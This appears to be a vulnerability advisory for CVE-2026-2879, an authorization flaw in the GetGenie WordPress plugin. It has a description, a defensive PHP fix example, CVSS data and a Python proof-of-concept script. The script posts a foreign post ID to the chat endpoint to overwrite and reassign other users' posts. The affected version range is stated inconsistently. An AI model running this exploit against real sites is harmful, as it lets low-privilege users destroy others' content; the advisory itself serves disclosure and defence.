Security Vulnerability Report
CVE-2026-2879 CVSS 5.4 MEDIUM

CVE-2026-2879

Published: 2026-03-13 19:54:35
Last Modified: 2026-04-22 21:30:26

Description

The GetGenie plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.3.2. This is due to missing validation on the `id` parameter in the `create()` method of the `GetGenieChat` REST API endpoint. The method accepts a user-controlled post ID and, when a post with that ID exists, calls `wp_update_post()` without verifying that the current user owns the post or that the post is of the expected `getgenie_chat` type. This makes it possible for authenticated attackers, with Author-level access and above, to overwrite arbitrary posts owned by any user — including Administrators — effectively destroying the original content by changing its `post_type` to `getgenie_chat` and reassigning `post_author` to the attacker.
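The two checks the description says `create()` lacks (post type and ownership, before `wp_update_post()`), written out as an added illustration that is not GetGenie's own code: the handler name, the request fields `id`/`name`/`content`, the `private` status and the `wp_insert_post()` branch for new chats are assumptions; the `getgenie_chat` post type and the `wp_update_post()` call come from the advisory.

```php
<?php
// Added illustrative example (not GetGenie's code): a REST callback that
// validates a caller-supplied post ID before calling wp_update_post().
// Assumed names: example_chat_create, the request fields 'id', 'name',
// 'content'. The 'getgenie_chat' post type comes from the advisory.

function example_chat_create( WP_REST_Request $request ) {
    $post_id = absint( $request->get_param( 'id' ) );
    $postarr = array(
        'post_title'   => sanitize_text_field( $request->get_param( 'name' ) ),
        'post_content' => wp_kses_post( $request->get_param( 'content' ) ),
        'post_type'    => 'getgenie_chat',
        'post_status'  => 'private',
    );

    if ( $post_id > 0 ) {
        $existing = get_post( $post_id );

        // 1. The ID must name an existing post of the expected type, so an
        //    update can never retype an unrelated post (the CVE's impact).
        if ( ! $existing instanceof WP_Post || 'getgenie_chat' !== $existing->post_type ) {
            return new WP_Error( 'rest_invalid_id', 'Unknown chat.', array( 'status' => 404 ) );
        }

        // 2. The caller must be allowed to edit this specific post and, for a
        //    per-user object, must own it (edit_post alone lets Editors and
        //    Administrators edit other users' posts).
        if ( ! current_user_can( 'edit_post', $post_id )
            || (int) $existing->post_author !== get_current_user_id() ) {
            return new WP_Error( 'rest_forbidden', 'Not your chat.', array( 'status' => 403 ) );
        }

        $postarr['ID']          = $post_id;
        $postarr['post_author'] = $existing->post_author; // never reassign on update
        $result = wp_update_post( $postarr, true );
    } else {
        // No ID: create a new chat owned by the caller.
        $postarr['post_author'] = get_current_user_id();
        $result = wp_insert_post( $postarr, true );
    }

    if ( is_wp_error( $result ) ) {
        return $result;
    }
    return rest_ensure_response( array( 'id' => $result ) );
}
```

The route's `permission_callback` should still require a logged-in user; that gate only decides who may reach the endpoint, while the object-level checks above decide which post that user may touch.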

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L
Weakness
CWE-639

Configurations (Affected Products)

No configuration data available.

GetGenie WordPress Plugin < 4.3.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2026-2879 PoC - GetGenie IDOR Vulnerability
# Target: WordPress site with GetGenie plugin <= 4.3.2
target_url = "http://target-wordpress-site.com"
api_endpoint = f"{target_url}/wp-json/getgenie-chat/v1/chat"

# Authentication: Use valid WordPress account with Author+ role
session = requests.Session()

# Step 1: Authenticate and get nonce
# Login to WordPress admin
login_url = f"{target_url}/wp-login.php"
credentials = {
    "log": "attacker_username",
    "pwd": "attacker_password"
}

# Step 2: Get REST API nonce from admin dashboard
# Extract nonce from wp-api nonce or use application password

# Step 3: Identify target post ID to overwrite
# Target any post (including posts by administrators)
target_post_id = "123"  # Replace with actual post ID to target

# Step 4: Exploit IDOR vulnerability
headers = {
    "Content-Type": "application/json",
    "X-WP-Nonce": "your-api-nonce"  # Obtain via wp_rest nonce
}

payload = {
    "id": target_post_id,  # IDOR: No ownership validation
    "name": "Malicious Chat",
    "content": "Compromised content via IDOR"
}

response = session.post(
    api_endpoint,
    headers=headers,
    json=payload
)

if response.status_code == 200:
    print("[+] IDOR Exploit Successful!")
    print(f"[+] Post ID {target_post_id} has been modified")
    print("[+] post_type changed to 'getgenie_chat'")
    print("[+] post_author changed to attacker ID")
else:
    print(f"[-] Exploit Failed: {response.status_code}")
    print(response.text)

References

https://plugins.trac.wordpress.org/browser/getgenie/tags/4.3.2/app/Api/GetGenieChat.php#L60
https://plugins.trac.wordpress.org/browser/getgenie/tags/4.3.2/app/Api/GetGenieChat.php#L91
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3479838%40getgenie%2Ftrunk&old=3446466%40getgenie%2Ftrunk&sfp_email=&sfph_mail=
https://www.wordfence.com/threat-intel/vulnerabilities/id/8030c334-458a-4d21-9a64-3f5df715ba97?source=cve
